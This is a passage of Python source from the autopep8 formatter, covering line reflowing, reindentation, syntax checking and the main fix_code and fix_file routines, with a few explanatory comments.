self._bracket_depth += 1
elif item_text in '}])':
self._bracket_depth -= 1
assert self._bracket_depth >= 0
def _add_container(self, container, indent_amt, break_after_open_bracket):
actual_indent = indent_amt + 1
if (
unicode(self._prev_item) != '=' and
not self.line_empty() and
not self.fits_on_current_line(
container.size + self._bracket_depth + 2)
):
if unicode(container)[0] == '(' and self._prev_item.is_name:
# Don't split before the opening bracket of a call.
break_after_open_bracket = True
actual_indent = indent_amt + 4
elif (
break_after_open_bracket or
unicode(self._prev_item) not in '([{'
):
# If the container doesn't fit on the current line and the
# current line isn't empty, place the container on the next
# line.
self._lines.append(self._LineBreak())
self._lines.append(self._Indent(indent_amt))
break_after_open_bracket = False
else:
actual_indent = self.current_size() + 1
break_after_open_bracket = False
if isinstance(container, (ListComprehension, IfExpression)):
actual_indent = indent_amt
# Increase the continued indentation only if recursing on a
# container.
container.reflow(self, ' ' * actual_indent,
break_after_open_bracket=break_after_open_bracket)
def _prevent_default_initializer_splitting(self, item, indent_amt):
"""Prevent splitting between a default initializer.
When there is a default initializer, it's best to keep it all on
the same line. It's nicer and more readable, even if it goes
over the maximum allowable line length. This goes back along the
current line to determine if we have a default initializer, and,
if so, to remove extraneous whitespaces and add a line
break/indent before it if needed.
"""
if unicode(item) == '=':
# This is the assignment in the initializer. Just remove spaces for
# now.
self._delete_whitespace()
return
if (not self._prev_item or not self._prev_prev_item or
unicode(self._prev_item) != '='):
return
self._delete_whitespace()
prev_prev_index = self._lines.index(self._prev_prev_item)
if (
isinstance(self._lines[prev_prev_index - 1], self._Indent) or
self.fits_on_current_line(item.size + 1)
):
# The default initializer is already the only item on this line.
# Don't insert a newline here.
return
# Replace the space with a newline/indent combo.
if isinstance(self._lines[prev_prev_index - 1], self._Space):
del self._lines[prev_prev_index - 1]
self.add_line_break_at(self._lines.index(self._prev_prev_item),
indent_amt)
def _split_after_delimiter(self, item, indent_amt):
"""Split the line only after a delimiter."""
self._delete_whitespace()
if self.fits_on_current_line(item.size):
return
last_space = None
for item in reversed(self._lines):
if (
last_space and
(not isinstance(item, Atom) or not item.is_colon)
):
break
else:
last_space = None
if isinstance(item, self._Space):
last_space = item
if isinstance(item, (self._LineBreak, self._Indent)):
return
if not last_space:
return
self.add_line_break_at(self._lines.index(last_space), indent_amt)
def _enforce_space(self, item):
"""Enforce a space in certain situations.
There are cases where we will want a space where normally we
wouldn't put one. This just enforces the addition of a space.
"""
if isinstance(self._lines[-1],
(self._Space, self._LineBreak, self._Indent)):
return
if not self._prev_item:
return
item_text = unicode(item)
prev_text = unicode(self._prev_item)
# Prefer a space around a '.' in an import statement, and between the
# 'import' and '('.
if (
(item_text == '.' and prev_text == 'from') or
(item_text == 'import' and prev_text == '.') or
(item_text == '(' and prev_text == 'import')
):
self._lines.append(self._Space())
def _delete_whitespace(self):
"""Delete all whitespace from the end of the line."""
while isinstance(self._lines[-1], (self._Space, self._LineBreak,
self._Indent)):
del self._lines[-1]
class Atom(object):
"""The smallest unbreakable unit that can be reflowed."""
def __init__(self, atom):
self._atom = atom
def __repr__(self):
return self._atom.token_string
def __len__(self):
return self.size
def reflow(
self, reflowed_lines, continued_indent, extent,
break_after_open_bracket=False,
is_list_comp_or_if_expr=False,
next_is_dot=False
):
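        """Add this atom to reflowed_lines.

        A line break is inserted first when the atom would not fit on the
        current line (with a few exceptions, e.g. colons and opening calls).
        """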
if self._atom.token_type == tokenize.COMMENT:
reflowed_lines.add_comment(self)
return
total_size = extent if extent else self.size
if self._atom.token_string not in ',:([{}])':
# Some atoms will need an extra 1-sized space token after them.
total_size += 1
prev_item = reflowed_lines.previous_item()
if (
not is_list_comp_or_if_expr and
not reflowed_lines.fits_on_current_line(total_size) and
not (next_is_dot and
reflowed_lines.fits_on_current_line(self.size + 1)) and
not reflowed_lines.line_empty() and
not self.is_colon and
not (prev_item and prev_item.is_name and
unicode(self) == '(')
):
# Start a new line if there is already something on the line and
# adding this atom would make it go over the max line length.
reflowed_lines.add_line_break(continued_indent)
else:
reflowed_lines.add_space_if_needed(unicode(self))
reflowed_lines.add(self, len(continued_indent),
break_after_open_bracket)
def emit(self):
return self.__repr__()
@property
def is_keyword(self):
return keyword.iskeyword(self._atom.token_string)
@property
def is_string(self):
return self._atom.token_type == tokenize.STRING
@property
def is_name(self):
return self._atom.token_type == tokenize.NAME
@property
def is_number(self):
return self._atom.token_type == tokenize.NUMBER
@property
def is_comma(self):
return self._atom.token_string == ','
@property
def is_colon(self):
return self._atom.token_string == ':'
@property
def size(self):
return len(self._atom.token_string)
class Container(object):
"""Base class for all container types."""
def __init__(self, items):
self._items = items
def __repr__(self):
string = ''
last_was_keyword = False
for item in self._items:
if item.is_comma:
string += ', '
elif item.is_colon:
string += ': '
else:
item_string = unicode(item)
if (
string and
(last_was_keyword or
(not string.endswith(tuple('([{,.:}]) ')) and
not item_string.startswith(tuple('([{,.:}])'))))
):
string += ' '
string += item_string
last_was_keyword = item.is_keyword
return string
def __iter__(self):
for element in self._items:
yield element
def __getitem__(self, idx):
return self._items[idx]
def reflow(self, reflowed_lines, continued_indent,
break_after_open_bracket=False):
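        """Reflow the contained items, adding line breaks where needed."""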
last_was_container = False
for (index, item) in enumerate(self._items):
next_item = get_item(self._items, index + 1)
if isinstance(item, Atom):
is_list_comp_or_if_expr = (
isinstance(self, (ListComprehension, IfExpression)))
item.reflow(reflowed_lines, continued_indent,
self._get_extent(index),
is_list_comp_or_if_expr=is_list_comp_or_if_expr,
next_is_dot=(next_item and
unicode(next_item) == '.'))
if last_was_container and item.is_comma:
reflowed_lines.add_line_break(continued_indent)
last_was_container = False
else: # isinstance(item, Container)
reflowed_lines.add(item, len(continued_indent),
break_after_open_bracket)
last_was_container = not isinstance(item, (ListComprehension,
IfExpression))
if (
break_after_open_bracket and index == 0 and
# Prefer to keep empty containers together instead of
# separating them.
unicode(item) == self.open_bracket and
(not next_item or unicode(next_item) != self.close_bracket) and
(len(self._items) != 3 or not isinstance(next_item, Atom))
):
reflowed_lines.add_line_break(continued_indent)
break_after_open_bracket = False
else:
next_next_item = get_item(self._items, index + 2)
if (
unicode(item) not in ['.', '%', 'in'] and
next_item and not isinstance(next_item, Container) and
unicode(next_item) != ':' and
next_next_item and (not isinstance(next_next_item, Atom) or
unicode(next_item) == 'not') and
not reflowed_lines.line_empty() and
not reflowed_lines.fits_on_current_line(
self._get_extent(index + 1) + 2)
):
reflowed_lines.add_line_break(continued_indent)
def _get_extent(self, index):
"""The extent of the full element.
E.g., the length of a function call or keyword.
"""
extent = 0
prev_item = get_item(self._items, index - 1)
seen_dot = prev_item and unicode(prev_item) == '.'
while index < len(self._items):
item = get_item(self._items, index)
index += 1
if isinstance(item, (ListComprehension, IfExpression)):
break
if isinstance(item, Container):
if prev_item and prev_item.is_name:
if seen_dot:
extent += 1
else:
extent += item.size
prev_item = item
continue
elif (unicode(item) not in ['.', '=', ':', 'not'] and
not item.is_name and not item.is_string):
break
if unicode(item) == '.':
seen_dot = True
extent += item.size
prev_item = item
return extent
@property
def is_string(self):
return False
@property
def size(self):
return len(self.__repr__())
@property
def is_keyword(self):
return False
@property
def is_name(self):
return False
@property
def is_comma(self):
return False
@property
def is_colon(self):
return False
@property
def open_bracket(self):
return None
@property
def close_bracket(self):
return None
class Tuple(Container):
"""A high-level representation of a tuple."""
@property
def open_bracket(self):
return '('
@property
def close_bracket(self):
return ')'
class List(Container):
"""A high-level representation of a list."""
@property
def open_bracket(self):
return '['
@property
def close_bracket(self):
return ']'
class DictOrSet(Container):
"""A high-level representation of a dictionary or set."""
@property
def open_bracket(self):
return '{'
@property
def close_bracket(self):
return '}'
class ListComprehension(Container):
"""A high-level representation of a list comprehension."""
@property
def size(self):
length = 0
for item in self._items:
if isinstance(item, IfExpression):
break
length += item.size
return length
class IfExpression(Container):
"""A high-level representation of an if-expression."""
def _parse_container(tokens, index, for_or_if=None):
"""Parse a high-level container, such as a list, tuple, etc."""
# Store the opening bracket.
items = [Atom(Token(*tokens[index]))]
index += 1
num_tokens = len(tokens)
while index < num_tokens:
tok = Token(*tokens[index])
if tok.token_string in ',)]}':
# First check if we're at the end of a list comprehension or
# if-expression. Don't add the ending token as part of the list
# comprehension or if-expression, because they aren't part of those
# constructs.
if for_or_if == 'for':
return (ListComprehension(items), index - 1)
elif for_or_if == 'if':
return (IfExpression(items), index - 1)
# We've reached the end of a container.
items.append(Atom(tok))
            # Determine which kind of container has just been closed.
if tok.token_string == ')':
# The end of a tuple.
return (Tuple(items), index)
elif tok.token_string == ']':
# The end of a list.
return (List(items), index)
elif tok.token_string == '}':
# The end of a dictionary or set.
return (DictOrSet(items), index)
elif tok.token_string in '([{':
# A sub-container is being defined.
(container, index) = _parse_container(tokens, index)
items.append(container)
elif tok.token_string == 'for':
(container, index) = _parse_container(tokens, index, 'for')
items.append(container)
elif tok.token_string == 'if':
(container, index) = _parse_container(tokens, index, 'if')
items.append(container)
else:
items.append(Atom(tok))
index += 1
return (None, None)
def _parse_tokens(tokens):
"""Parse the tokens.
This converts the tokens into a form where we can manipulate them
more easily.
"""
index = 0
parsed_tokens = []
num_tokens = len(tokens)
while index < num_tokens:
tok = Token(*tokens[index])
assert tok.token_type != token.INDENT
if tok.token_type == tokenize.NEWLINE:
# There's only one newline and it's at the end.
break
if tok.token_string in '([{':
(container, index) = _parse_container(tokens, index)
if not container:
return None
parsed_tokens.append(container)
else:
parsed_tokens.append(Atom(tok))
index += 1
return parsed_tokens
def _reflow_lines(parsed_tokens, indentation, max_line_length,
start_on_prefix_line):
"""Reflow the lines so that it looks nice."""
if unicode(parsed_tokens[0]) == 'def':
# A function definition gets indented a bit more.
continued_indent = indentation + ' ' * 2 * DEFAULT_INDENT_SIZE
else:
continued_indent = indentation + ' ' * DEFAULT_INDENT_SIZE
break_after_open_bracket = not start_on_prefix_line
lines = ReformattedLines(max_line_length)
lines.add_indent(len(indentation.lstrip('\r\n')))
if not start_on_prefix_line:
# If splitting after the opening bracket will cause the first element
# to be aligned weirdly, don't try it.
first_token = get_item(parsed_tokens, 0)
second_token = get_item(parsed_tokens, 1)
if (
first_token and second_token and
unicode(second_token)[0] == '(' and
len(indentation) + len(first_token) + 1 == len(continued_indent)
):
return None
for item in parsed_tokens:
lines.add_space_if_needed(unicode(item), equal=True)
save_continued_indent = continued_indent
if start_on_prefix_line and isinstance(item, Container):
start_on_prefix_line = False
continued_indent = ' ' * (lines.current_size() + 1)
item.reflow(lines, continued_indent, break_after_open_bracket)
continued_indent = save_continued_indent
return lines.emit()
def _shorten_line_at_tokens_new(tokens, source, indentation,
max_line_length):
"""Shorten the line taking its length into account.
The input is expected to be free of newlines except for inside
multiline strings and at the end.
"""
    # Yield the original source first so we can see if it's a better choice
    # than the shortened candidate lines we generate here.
yield indentation + source
parsed_tokens = _parse_tokens(tokens)
if parsed_tokens:
# Perform two reflows. The first one starts on the same line as the
# prefix. The second starts on the line after the prefix.
fixed = _reflow_lines(parsed_tokens, indentation, max_line_length,
start_on_prefix_line=True)
if fixed and check_syntax(normalize_multiline(fixed.lstrip())):
yield fixed
fixed = _reflow_lines(parsed_tokens, indentation, max_line_length,
start_on_prefix_line=False)
if fixed and check_syntax(normalize_multiline(fixed.lstrip())):
yield fixed
def _shorten_line_at_tokens(tokens, source, indentation, indent_word,
key_token_strings, aggressive):
"""Separate line by breaking at tokens in key_token_strings.
The input is expected to be free of newlines except for inside
multiline strings and at the end.
"""
offsets = []
for (index, _t) in enumerate(token_offsets(tokens)):
(token_type,
token_string,
start_offset,
end_offset) = _t
assert token_type != token.INDENT
if token_string in key_token_strings:
# Do not break in containers with zero or one items.
unwanted_next_token = {
'(': ')',
'[': ']',
'{': '}'}.get(token_string)
if unwanted_next_token:
if (
get_item(tokens,
index + 1,
default=[None, None])[1] == unwanted_next_token or
get_item(tokens,
index + 2,
default=[None, None])[1] == unwanted_next_token
):
continue
if (
index > 2 and token_string == '(' and
tokens[index - 1][1] in ',(%['
):
# Don't split after a tuple start, or before a tuple start if
# the tuple is in a list.
continue
if end_offset < len(source) - 1:
# Don't split right before newline.
offsets.append(end_offset)
else:
# Break at adjacent strings. These were probably meant to be on
# separate lines in the first place.
previous_token = get_item(tokens, index - 1)
if (
token_type == tokenize.STRING and
previous_token and previous_token[0] == tokenize.STRING
):
offsets.append(start_offset)
current_indent = None
fixed = None
for line in split_at_offsets(source, offsets):
if fixed:
fixed += '\n' + current_indent + line
for symbol in '([{':
if line.endswith(symbol):
current_indent += indent_word
else:
# First line.
fixed = line
assert not current_indent
current_indent = indent_word
assert fixed is not None
if check_syntax(normalize_multiline(fixed)
if aggressive > 1 else fixed):
return indentation + fixed
else:
return None
def token_offsets(tokens):
"""Yield tokens and offsets."""
end_offset = 0
previous_end_row = 0
previous_end_column = 0
for t in tokens:
token_type = t[0]
token_string = t[1]
(start_row, start_column) = t[2]
(end_row, end_column) = t[3]
# Account for the whitespace between tokens.
end_offset += start_column
if previous_end_row == start_row:
end_offset -= previous_end_column
# Record the start offset of the token.
start_offset = end_offset
# Account for the length of the token itself.
end_offset += len(token_string)
yield (token_type,
token_string,
start_offset,
end_offset)
previous_end_row = end_row
previous_end_column = end_column
def normalize_multiline(line):
"""Normalize multiline-related code that will cause syntax error.
This is for purposes of checking syntax.
"""
if line.startswith('def ') and line.rstrip().endswith(':'):
return line + ' pass'
elif line.startswith('return '):
return 'def _(): ' + line
elif line.startswith('@'):
return line + 'def _(): pass'
elif line.startswith('class '):
return line + ' pass'
elif line.startswith('if '):
return line + ' pass'
else:
return line
def fix_whitespace(line, offset, replacement):
"""Replace whitespace at offset and return fixed line."""
# Replace escaped newlines too
left = line[:offset].rstrip('\n\r \t\\')
right = line[offset:].lstrip('\n\r \t\\')
if right.startswith('#'):
return line
else:
return left + replacement + right
def _execute_pep8(pep8_options, source):
"""Execute pep8 via python method calls."""
class QuietReport(pep8.BaseReport):
"""Version of checker that does not print."""
def __init__(self, options):
super(QuietReport, self).__init__(options)
self.__full_error_results = []
def error(self, line_number, offset, text, _):
"""Collect errors."""
code = super(QuietReport, self).error(line_number, offset, text, _)
if code:
self.__full_error_results.append(
{'id': code,
'line': line_number,
'column': offset + 1,
'info': text})
def full_error_results(self):
"""Return error results in detail.
Results are in the form of a list of dictionaries. Each
dictionary contains 'id', 'line', 'column', and 'info'.
"""
return self.__full_error_results
checker = pep8.Checker('', lines=source,
reporter=QuietReport, **pep8_options)
checker.check_all()
return checker.report.full_error_results()
def _remove_leading_and_normalize(line):
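    """Return the line without leading whitespace, ending in one newline."""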
return line.lstrip().rstrip(CR + LF) + '\n'
class Reindenter(object):
"""Reindents badly-indented code to uniformly use four-space indentation.
Released to the public domain, by Tim Peters, 03 October 2000.
"""
def __init__(self, input_text):
sio = io.StringIO(input_text)
source_lines = sio.readlines()
self.string_content_line_numbers = multiline_string_lines(input_text)
# File lines, rstripped & tab-expanded. Dummy at start is so
# that we can use tokenize's 1-based line numbering easily.
# Note that a line is all-blank iff it is a newline.
self.lines = []
line_number = 0
for line in source_lines:
line_number += 1
# Do not modify if inside a multiline string.
if line_number in self.string_content_line_numbers:
self.lines.append(line)
else:
# Only expand leading tabs.
self.lines.append(_get_indentation(line).expandtabs() +
_remove_leading_and_normalize(line))
self.lines.insert(0, None)
self.index = 1 # index into self.lines of next line
self.input_text = input_text
def run(self, indent_size=DEFAULT_INDENT_SIZE):
"""Fix indentation and return modified line numbers.
Line numbers are indexed at 1.
"""
if indent_size < 1:
return self.input_text
try:
stats = _reindent_stats(tokenize.generate_tokens(self.getline))
except (SyntaxError, tokenize.TokenError):
return self.input_text
# Remove trailing empty lines.
lines = self.lines
while lines and lines[-1] == '\n':
lines.pop()
# Sentinel.
stats.append((len(lines), 0))
# Map count of leading spaces to # we want.
have2want = {}
# Program after transformation.
after = []
# Copy over initial empty lines -- there's nothing to do until
# we see a line with *something* on it.
i = stats[0][0]
after.extend(lines[1:i])
for i in range(len(stats) - 1):
thisstmt, thislevel = stats[i]
nextstmt = stats[i + 1][0]
have = _leading_space_count(lines[thisstmt])
want = thislevel * indent_size
if want < 0:
# A comment line.
if have:
# An indented comment line. If we saw the same
# indentation before, reuse what it most recently
# mapped to.
want = have2want.get(have, -1)
if want < 0:
# Then it probably belongs to the next real stmt.
for j in range(i + 1, len(stats) - 1):
jline, jlevel = stats[j]
if jlevel >= 0:
if have == _leading_space_count(lines[jline]):
want = jlevel * indent_size
break
if want < 0: # Maybe it's a hanging
# comment like this one,
# in which case we should shift it like its base
# line got shifted.
for j in range(i - 1, -1, -1):
jline, jlevel = stats[j]
if jlevel >= 0:
want = (have + _leading_space_count(
after[jline - 1]) -
_leading_space_count(lines[jline]))
break
if want < 0:
# Still no luck -- leave it alone.
want = have
else:
want = 0
assert want >= 0
have2want[have] = want
diff = want - have
if diff == 0 or have == 0:
after.extend(lines[thisstmt:nextstmt])
else:
line_number = thisstmt - 1
for line in lines[thisstmt:nextstmt]:
line_number += 1
if line_number in self.string_content_line_numbers:
after.append(line)
elif diff > 0:
if line == '\n':
after.append(line)
else:
after.append(' ' * diff + line)
else:
remove = min(_leading_space_count(line), -diff)
after.append(line[remove:])
return ''.join(after)
def getline(self):
"""Line-getter for tokenize."""
if self.index >= len(self.lines):
line = ''
else:
line = self.lines[self.index]
self.index += 1
return line
def _reindent_stats(tokens):
"""Return list of (lineno, indentlevel) pairs.
One for each stmt and comment line. indentlevel is -1 for comment lines, as
a signal that tokenize doesn't know what to do about them; indeed, they're
our headache!
"""
find_stmt = 1 # Next token begins a fresh stmt?
level = 0 # Current indent level.
stats = []
for t in tokens:
token_type = t[0]
sline = t[2][0]
line = t[4]
if token_type == tokenize.NEWLINE:
# A program statement, or ENDMARKER, will eventually follow,
# after some (possibly empty) run of tokens of the form
# (NL | COMMENT)* (INDENT | DEDENT+)?
find_stmt = 1
elif token_type == tokenize.INDENT:
find_stmt = 1
level += 1
elif token_type == tokenize.DEDENT:
find_stmt = 1
level -= 1
elif token_type == tokenize.COMMENT:
if find_stmt:
stats.append((sline, -1))
# But we're still looking for a new stmt, so leave
# find_stmt alone.
elif token_type == tokenize.NL:
pass
elif find_stmt:
# This is the first "real token" following a NEWLINE, so it
# must be the first token of the next program statement, or an
# ENDMARKER.
find_stmt = 0
if line: # Not endmarker.
stats.append((sline, level))
return stats
def _leading_space_count(line):
"""Return number of leading spaces in line."""
i = 0
while i < len(line) and line[i] == ' ':
i += 1
return i
def refactor_with_2to3(source_text, fixer_names):
"""Use lib2to3 to refactor the source.
Return the refactored source code.
"""
check_lib2to3()
from lib2to3.refactor import RefactoringTool
fixers = ['lib2to3.fixes.fix_' + name for name in fixer_names]
tool = RefactoringTool(fixer_names=fixers, explicit=fixers)
from lib2to3.pgen2 import tokenize as lib2to3_tokenize
try:
return unicode(tool.refactor_string(source_text, name=''))
except lib2to3_tokenize.TokenError:
return source_text
def check_syntax(code):
"""Return True if syntax is okay."""
try:
return compile(code, '<string>', 'exec')
except (SyntaxError, TypeError, UnicodeDecodeError):
return False
def filter_results(source, results, aggressive):
"""Filter out spurious reports from pep8.
    If aggressive is enabled, possibly unsafe fixes are allowed through
    (E711/W6 at level 1 and above, E712/E713 at level 2 and above).
"""
non_docstring_string_line_numbers = multiline_string_lines(
source, include_docstrings=False)
all_string_line_numbers = multiline_string_lines(
source, include_docstrings=True)
commented_out_code_line_numbers = commented_out_code_lines(source)
for r in results:
issue_id = r['id'].lower()
if r['line'] in non_docstring_string_line_numbers:
if issue_id.startswith(('e1', 'e501', 'w191')):
continue
if r['line'] in all_string_line_numbers:
if issue_id in ['e501']:
continue
# We must offset by 1 for lines that contain the trailing contents of
# multiline strings.
if not aggressive and (r['line'] + 1) in all_string_line_numbers:
            # Do not modify multiline strings in non-aggressive mode. Removing
            # trailing whitespace could break doctests.
if issue_id.startswith(('w29', 'w39')):
continue
if aggressive <= 0:
if issue_id.startswith(('e711', 'w6')):
continue
if aggressive <= 1:
if issue_id.startswith(('e712', 'e713')):
continue
if r['line'] in commented_out_code_line_numbers:
if issue_id.startswith(('e26', 'e501')):
continue
yield r
def multiline_string_lines(source, include_docstrings=False):
"""Return line numbers that are within multiline strings.
The line numbers are indexed at 1.
Docstrings are ignored.
"""
line_numbers = set()
previous_token_type = ''
try:
for t in generate_tokens(source):
token_type = t[0]
start_row = t[2][0]
end_row = t[3][0]
if token_type == tokenize.STRING and start_row != end_row:
if (
include_docstrings or
previous_token_type != tokenize.INDENT
):
# We increment by one since we want the contents of the
# string.
line_numbers |= set(range(1 + start_row, 1 + end_row))
previous_token_type = token_type
except (SyntaxError, tokenize.TokenError):
pass
return line_numbers
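# Editor's note: an illustrative call, added for clarity and not part of the
# original module. For the source below, the triple-quoted string spans lines
# 1-3, so the returned set holds the lines carrying its continuation contents:
#
#     src = 'x = """line1\nline2\nline3"""\ny = 1\n'
#     multiline_string_lines(src)   # -> set([2, 3])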
def commented_out_code_lines(source):
"""Return line numbers of comments that are likely code.
Commented-out code is bad practice, but modifying it just adds even more
clutter.
"""
line_numbers = []
try:
for t in generate_tokens(source):
token_type = t[0]
token_string = t[1]
start_row = t[2][0]
line = t[4]
# Ignore inline comments.
if not line.lstrip().startswith('#'):
continue
if token_type == tokenize.COMMENT:
stripped_line = token_string.lstrip('#').strip()
if (
' ' in stripped_line and
'#' not in stripped_line and
check_syntax(stripped_line)
):
line_numbers.append(start_row)
except (SyntaxError, tokenize.TokenError):
pass
return line_numbers
def shorten_comment(line, max_line_length, last_comment=False):
"""Return trimmed or split long comment line.
If there are no comments immediately following it, do a text wrap.
Doing this wrapping on all comments in general would lead to jagged
comment text.
"""
assert len(line) > max_line_length
line = line.rstrip()
# PEP 8 recommends 72 characters for comment text.
indentation = _get_indentation(line) + '# '
max_line_length = min(max_line_length,
len(indentation) + 72)
MIN_CHARACTER_REPEAT = 5
if (
len(line) - len(line.rstrip(line[-1])) >= MIN_CHARACTER_REPEAT and
not line[-1].isalnum()
):
# Trim comments that end with things like ---------
return line[:max_line_length] + '\n'
elif last_comment and re.match(r'\s*#+\s*\w+', line):
import textwrap
split_lines = textwrap.wrap(line.lstrip(' \t#'),
initial_indent=indentation,
subsequent_indent=indentation,
width=max_line_length,
break_long_words=False,
break_on_hyphens=False)
return '\n'.join(split_lines) + '\n'
else:
return line + '\n'
def normalize_line_endings(lines, newline):
"""Return fixed line endings.
All lines will be modified to use the most common line ending.
"""
return [line.rstrip('\n\r') + newline for line in lines]
def mutual_startswith(a, b):
return b.startswith(a) or a.startswith(b)
def code_match(code, select, ignore):
if ignore:
assert not isinstance(ignore, unicode)
for ignored_code in [c.strip() for c in ignore]:
if mutual_startswith(code.lower(), ignored_code.lower()):
return False
if select:
assert not isinstance(select, unicode)
for selected_code in [c.strip() for c in select]:
if mutual_startswith(code.lower(), selected_code.lower()):
return True
return False
return True
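# Editor's note: illustrative examples of the select/ignore matching above,
# added for clarity and not part of the original module. Matching is by mutual
# prefix, so 'E5' matches 'E501' and vice versa.
#
#     code_match('E501', select=[], ignore=['E5'])    # -> False (ignored)
#     code_match('E501', select=['E5'], ignore=[])    # -> True  (selected)
#     code_match('W191', select=['E'], ignore=[])     # -> False (not selected)
#     code_match('E711', select=[], ignore=[])        # -> True  (no filters)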
def fix_code(source, options=None, encoding=None):
"""Return fixed source code."""
if not options:
options = parse_args([''])
if not isinstance(source, unicode):
source = source.decode(encoding or locale.getpreferredencoding())
sio = io.StringIO(source)
return fix_lines(sio.readlines(), options=options)
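# Editor's note: a minimal usage sketch for fix_code(), added for clarity and
# not part of the original module. It assumes this file is importable as
# `autopep8` and that the default options are acceptable; the exact output may
# vary between releases.
#
#     import autopep8
#
#     ugly = 'import os,sys\nx=1 ;y=2\n'
#     print(autopep8.fix_code(ugly))
#     # roughly: 'import os\nimport sys\nx = 1\ny = 2\n'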
def fix_lines(source_lines, options, filename=''):
"""Return fixed source code."""
# Transform everything to line feed. Then change them back to original
# before returning fixed source code.
original_newline = find_newline(source_lines)
tmp_source = ''.join(normalize_line_endings(source_lines, '\n'))
# Keep a history to break out of cycles.
previous_hashes = set()
if options.line_range:
fixed_source = apply_local_fixes(tmp_source, options)
else:
# Apply global fixes only once (for efficiency).
fixed_source = apply_global_fixes(tmp_source, options)
passes = 0
long_line_ignore_cache = set()
while hash(fixed_source) not in previous_hashes:
if options.pep8_passes >= 0 and passes > options.pep8_passes:
break
passes += 1
previous_hashes.add(hash(fixed_source))
tmp_source = copy.copy(fixed_source)
fix = FixPEP8(
filename,
options,
contents=tmp_source,
long_line_ignore_cache=long_line_ignore_cache)
fixed_source = fix.fix()
sio = io.StringIO(fixed_source)
return ''.join(normalize_line_endings(sio.readlines(), original_newline))
def fix_file(filename, options=None, output=None):
if not options:
options = parse_args([filename])
original_source = readlines_from_file(filename)
fixed_source = original_source
if options.in_place or output:
encoding = detect_encoding(filename)
if output:
output = codecs.getwriter(encoding)(output.buffer
if hasattr(output, 'buffer')
else output)
output = LineEndingWrapper(output)
fixed_source = fix_lines(fixed_source, options, filename=filename)
if options.diff:
new = io.StringIO(fixed_source)
new = new.readlines()
diff = get_diff_text(original_source, new, filename)
if output:
output.write(diff)
output.flush()
else:
return diff
elif options.in_place:
fp = open_with_encoding(filename, encoding=encoding,
mode='w')
fp.write(fixed_source)
fp.close()
else:
if output:
output.write(fixed_source)
output.flush()
else:
return fixed_source
def global_fixes():
"""Yield multiple (code, function) tuples."""
for function in globals().values():
if inspect.isfunction(function):
arguments = inspect.getargspec(function)[0]
if arguments[:1] != ['source']:
continue
code = extract_code_from_function(function)
if code:
yield (code, function)
def apply_global_fixes(source, options, where='global'):
"""Run global fixes on source code.
These are fixes that only need be done once (unlike those in
FixPEP8, which are dependent on pep8).
"""
if code_match('E101', select=options.select, ignore=options.ignore):
source = reindent(source,
indent_size=options.indent_size)
for (code, function) in global_fixes():
if code_match(code, select=options.select, ignore=options.ignore):
if options.verbose:
print('---> Applying {0} fix for {1}'.format(where,
code.upper()),
file=sys.stderr)
source = function(source,
aggressive=options.aggressive)
source = fix_2to3(source,
aggressive=options.aggressive,
select=options.select,
ignore=options.ignore)
return source
def apply_local_fixes(source, options):
"""Ananologus to apply_global_fixes, but runs only those which makes sense
for the given line_range.
Do as much as we can without breaking code.
"""
def find_ge(a, x):
"""Find leftmost item greater than or equal to x."""
i = bisect.bisect_left(a, x)
if i != len(a):
return i, a[i]
return len(a) - 1, a[-1]
def find_le(a, x):
"""Find rightmost value less than or equal to x."""
i = bisect.bisect_right(a, x)
if i:
return i - 1, a[i - 1]
return 0, a[0]
def local_fix(source, start_log, end_log,
start_lines, end_lines, indents, last_line):
"""apply_global_fixes to the source between start_log and end_log.
The subsource must be the correct syntax of a complete python program
(but all lines may share an indentation). The subsource's shared indent
is removed, fixes are applied and the indent prepended back. Taking
care to not reindent strings.
last_line is the strict cut off (options.line_range[1]), so that
lines after last_line are not modified.
"""
if end_log < start_log:
return source
ind = indents[start_log]
indent = _get_indentation(source[start_lines[start_log]])
sl = slice(start_lines[start_log], end_lines[end_log] + 1)
subsource = source[sl]
# Remove indent from subsource.
if ind:
for line_no in start_lines[start_log:end_log + 1]:
pos = line_no - start_lines[start_log]
subsource[pos] = subsource[pos][ind:]
# Fix indentation of subsource.
fixed_subsource = apply_global_fixes(''.join(subsource),
options,
where='local')
fixed_subsource = fixed_subsource.splitlines(True)
# Add back indent for non multi-line strings lines.
msl = multiline_string_lines(''.join(fixed_subsource),
include_docstrings=False)
for i, line in enumerate(fixed_subsource):
if not i + 1 in msl:
fixed_subsource[i] = indent + line if line != '\n' else line
# We make a special case to look at the final line, if it's a multiline
# *and* the cut off is somewhere inside it, we take the fixed
# subset up until last_line, this assumes that the number of lines
# does not change in this multiline line.
changed_lines = len(fixed_subsource)
if (start_lines[end_log] != end_lines[end_log]
and end_lines[end_log] > last_line):
after_end = end_lines[end_log] - last_line
fixed_subsource = (fixed_subsource[:-after_end] +
source[sl][-after_end:])
changed_lines -= after_end
options.line_range[1] = (options.line_range[0] +
changed_lines - 1)
return (source[:start_lines[start_log]] +
fixed_subsource +
source[end_lines[end_log] + 1:])
def is_continued_stmt(line,
continued_stmts=frozenset(['else', 'elif',
'finally', 'except'])):
return re.split('[ :]', line.strip(), 1)[0] in continued_stmts
assert options.line_range
start, end = options.line_range
start -= 1
end -= 1
last_line = end # We shouldn't modify lines after this cut-off.
try:
logical = _find_logical(source)
except (SyntaxError, tokenize.TokenError):
return ''.join(source)
if not logical[0]:
# Just blank lines, this should imply that it will become '\n' ?
return apply_global_fixes(source, options)
start_lines, indents = zip(*logical[0])
end_lines, _ = zip(*logical[1])
source = source.splitlines(True)
start_log, start = find_ge(start_lines, start)
end_log, end = find_le(start_lines, end)
# Look behind one line, if it's indented less than current indent
# then we can move to this previous line knowing that its
# indentation level will not be changed.
if (start_log > 0
and indents[start_log - 1] < indents[start_log]
and not is_continued_stmt(source[start_log - 1])):
start_log -= 1
start = start_lines[start_log]
while start < end:
if is_continued_stmt(source[start]):
start_log += 1
start = start_lines[start_log]
continue
ind = indents[start_log]
for t in itertools.takewhile(lambda t: t[1][1] >= ind,
enumerate(logical[0][start_log:])):
n_log, n = start_log + t[0], t[1][0]
# start shares indent up to n.
if n <= end:
source = local_fix(source, start_log, n_log,
start_lines, end_lines,
indents, last_line)
start_log = n_log if n == end else n_log + 1
start = start_lines[start_log]
continue
else:
# Look at the line after end and see if allows us to reindent.
after_end_log, after_end = find_ge(start_lines, end + 1)
if indents[after_end_log] > indents[start_log]:
start_log, start = find_ge(start_lines, start + 1)
continue
if (indents[after_end_log] == indents[start_log]
and is_continued_stmt(source[after_end])):
# find n, the beginning of the last continued statement
# Apply fix to previous block if there is one.
only_block = True
for n, n_ind in logical[0][start_log:end_log + 1][::-1]:
